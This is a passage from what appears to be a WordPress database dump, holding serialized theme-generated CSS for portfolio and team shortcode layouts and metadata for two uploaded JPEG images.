#ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(18153,3005,'_wp_attached_file','2022/11/ws18m2.jpg'),
(18154,3005,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:585;s:6:\"height\";i:329;s:4:\"file\";s:18:\"2022/11/ws18m2.jpg\";s:8:\"filesize\";i:161442;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws18m2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13923;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws18m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7167;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18156,3019,'_wp_attached_file','2022/11/ws19m2.jpg'),
(18157,3019,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:644;s:6:\"height\";i:345;s:4:\"file\";s:18:\"2022/11/ws19m2.jpg\";s:8:\"filesize\";i:287037;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws19m2-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19009;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws19m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8664;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18158,2996,'the7_shortcodes_dynamic_css','a:2:{s:32:\"a27775386ce3c6b38a8f4e9a19b5bd2e\";s:6510:\".dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e  .team-media {\n  padding: 10px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a27775386ce3c6b38a8f4e9a19b5bd2e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  